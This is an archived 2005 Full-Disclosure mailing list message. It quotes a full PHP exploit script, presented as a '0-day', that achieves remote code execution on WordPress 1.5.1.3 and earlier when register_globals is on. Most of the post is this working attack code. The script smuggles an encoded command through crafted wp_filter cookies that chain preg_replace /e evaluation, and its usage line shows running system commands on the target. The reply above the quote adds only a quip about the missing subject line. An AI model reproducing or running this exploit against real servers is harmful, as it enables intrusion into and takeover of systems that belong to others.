| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Tue Aug 9 17:06:05 2005
From: kf_lists at digitalmunition.com (KF (lists))
Subject: (no subject)
Maybe next I can enjoy a subject line?
-KF
kartoffelguru@...h.com wrote:
>now enjoy as attachment...
>
>
>------------------------------------------------------------------------
>
><?php
> echo "Wordpress <= 1.5.1.3 - remote code execution 0-DDAAYY exploit\n";
> echo "(C) Copyright 2005 Kartoffelguru\n\n";
> echo "[!] info: requires register_globals turned on on target host\n\n";
> if (!extension_loaded('curl')) {
> die ("[-] you need the curl extension activated...\n");
> }
>
> function usage()
> {
> die ("usage:\n\t./wpx.php -h http://www.xyz.net/blog/ -c 'system(\"uname -a;id\");'\n\n");
> }
>
> $options = getopt("h:c:");
> if (count($options) < 1 || !isset($options['h'])) {
> usage();
> }
>
> $host = (is_array($options['h']) ? $options['h'][0]:$options['h']);
> $cmd = (is_array($options['c']) ? $options['c'][0]:$options['c']);
>
> if (!preg_match("/^http:\/\//", $host, $dummy)) {
> usage();
> }
>
> if (strlen(trim($cmd))==0) {
> $cmd = 'phpinfo();';
> }
>
> $code = base64_encode($cmd);
> $cnv = "";
> for ($i=0;$i<strlen($code); $i++) {
> $cnv.= "chr(".ord($code[$i]).").";
> }
> $cnv.="chr(32)";
>
> $str = base64_encode('args[0]=eval(base64_decode('.$cnv.')).die()&args[1]=x');
>
> $cookie='wp_filter[query_vars][0][0][function]=get_lastpostdate;wp_filter[query_vars][0][0][accepted_args]=0;';
> $cookie.='wp_filter[query_vars][0][1][function]=base64_decode;wp_filter[query_vars][0][1][accepted_args]=1;';
> $cookie.='cache_lastpostmodified[server]=//e;cache_lastpostdate[server]=';
> $cookie.=$str;
> $cookie.=';wp_filter[query_vars][1][0][function]=parse_str;wp_filter[query_vars][1][0][accepted_args]=1;';
> $cookie.='wp_filter[query_vars][2][0][function]=get_lastpostmodified;wp_filter[query_vars][2][0][accepted_args]=0;';
> $cookie.='wp_filter[query_vars][3][0][function]=preg_replace;wp_filter[query_vars][3][0][accepted_args]=3;';
>
> $ch = curl_init();
> curl_setopt($ch, CURLOPT_URL, $host);
> curl_setopt($ch, CURLOPT_POST, 0);
> curl_setopt($ch, CURLOPT_COOKIE, $cookie);
> curl_setopt($ch, CURLOPT_HEADER, 0);
> curl_setopt($ch, CURLOPT_CURLOPT_REFERER, $host);
> curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
> curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)");
> curl_setopt($ch, CURLOPT_HTTP_VERSION, CURL_HTTP_VERSION_1_0);
> echo "[+] now executing\n\n";
>
> $r = curl_exec($ch);
> curl_close($ch);
>
> echo $r;
>
>?>
>
>------------------------------------------------------------------------
>
>_______________________________________________
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/
>
Powered by blists - more mailing lists